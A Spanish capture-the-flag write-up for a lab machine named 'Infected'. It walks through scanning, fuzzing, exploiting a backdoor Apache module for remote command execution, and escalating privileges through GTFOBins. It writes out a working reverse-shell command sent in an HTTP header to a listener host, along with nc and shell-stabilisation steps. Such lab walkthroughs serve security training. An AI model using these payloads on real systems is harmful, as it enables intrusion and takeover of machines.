Infected

Conocer la red

Lo primero de todos es encontrar equipos dentro de mi red.

sudo arp-scan -I eth0 --localnet

captura-red

Como ya sabemos, las máscaras que empiezan por 00:0c son de VMware, por lo tanto la máquina atacante es la 192.168.166.104.

Conectividad con la máquina atacante

Comprobamos que tenemos conectividad.

ping -c1 192.168.166.104

captura-ping

Vemos que el ttl es 64 por lo que significa que es una máquina Linux.

Escaneo de puertos

Ahora vamos a hacer un escáneo para ver los puertos que están abiertos

sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -vvv -Pn 192.168.166.104 -oN allPorts

captura-escaneo

Podemos ver que utiliza para el puerto 80 Apache. Lo confirmamos buscando en el navegador la IP atacante.

captura-apache

Fuzzing

Lo que se me ocurre ahora mismo es hacer Fuzzing para encontrar directorios o subdirectorios. Se pueden utilizar gobuster, wfuzz. En mi caso voy a utilizar gobuster.

sudo gobuster dir -w /usr/share/wordlist/Seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.py,.html -u "http://192.168.166.104/"

captura-gobuster

Encontramos un info.php. Lo buscamos en el navegador.

captura-backdoor

Vemos que hay un módulo bastante sospechoso llamado backdoor o puerta trasera.

captura-mod

Podemos ejecutar comandos de manera remota (RCE).

captura-whoami

Vemos que si podemos ejecutar. Por lo tanto lo que se me ocurre en estos momentos es hacer una reverse shell.

curl -sX GET -H "Backdoor: bash -c 'bash -i >& /dev/tcp/192.168.166.103/443 0>&1'" "http://192.168.166.104"

Pero antes nos ponemos en escucha.

nc -nlvp 443

Y ahora sí le damos.

captura-nc

Volvemos la reverse shell útil y cómoda.

script /dev/null -c bash

CTRL + Z

stty raw -echo; fg

reset xterm

export TERM=xterm

export BASH=bash

Podemos ejecutar service como laurent. Buscamos el binario en GTfobins.

Y seguimos los pasos

captura-gtfobins

Una vez hechos los pasos, buscamos la flag.

captura-laurent

Ahora vamos a por la de root.

captura-root

Vemos que podemos ejecutar como root el comando joe.

Volvemos a buscar en GTfobins.

captura-gtfobins-joe

Seguimos los pasos.

captura-joe-root

Y buscamos la flag.

captura-flag-root

Encontramos las dos flag.

Última actualización